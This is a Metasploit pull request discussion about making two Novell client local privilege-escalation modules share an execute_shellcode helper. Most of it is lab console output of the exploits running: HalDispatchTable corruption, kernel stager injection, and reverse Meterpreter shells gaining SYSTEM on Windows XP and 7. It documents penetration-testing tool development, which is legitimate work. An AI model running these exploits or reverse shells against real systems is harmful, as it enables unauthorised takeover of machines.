[SeeRM:#8136] & [SeeRM:#8137] - Use execute_shellcode in novell modules

[wchen-r7]

Use execute_shellcode() found in Msf::Post::Windows::Processo instead of having their own. Please: It's best to give Juan time to review this.

[jvazquez-r7]

Works, thanks @wchen-r7 for taking care. Just added a last fix to avoid putting the final userland payload on a fixed address: ad94f43

Working after changes:

msf exploit(novell_client_nwfs) > set session 1
session => 1
msf exploit(novell_client_nwfs) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.0.4:4444 
[*] Detecting the target system...
[*] "Windows XP (Build 2600, Service Pack 3)."
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\nwfs found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x3
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Injecting 290 bytes to memory and executing it...
[*] Sending stage (751104 bytes) to 192.168.0.4
[+] Enjoy

[*] Meterpreter session 3 opened (192.168.0.4:4444 -> 192.168.0.4:59622) at 2013-07-05 10:12:58 -0500

meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.4 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(novell_client_nwfs) > use exploit/multi/handler 
msf exploit(handler) > sessions -K
[*] Killing all sessions...
[*] 192.168.172.245 - Meterpreter session 1 closed.
msf exploit(handler) > jobs -K
Stopping all jobs...
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.196
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.196:49168) at 2013-07-05 10:18:39 -0500

meterpreter > background
[*] Backgrounding session 4...
msf exploit(handler) > use exploit/windows/local/novell_client_nicm 
msf exploit(novell_client_nicm) > set session 4
session => 4
msf exploit(novell_client_nicm) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.0.4:4444 
[*] Detecting the target system...
[*] Running against Windows 7 SP1
[*] Checking device...
[+] \\.\nicm found!
[*] Storing the Kernel stager on memory...
[*] Triggering the vulnerability to execute the Kernel Handler
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Injecting 290 bytes to memory and executing it...
[*] Sending stage (751104 bytes) to 192.168.0.4
[+] Enjoy
[*] Meterpreter session 5 opened (192.168.0.4:4444 -> 192.168.0.4:60102) at 2013-07-05 10:18:56 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.196 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(novell_client_nicm) >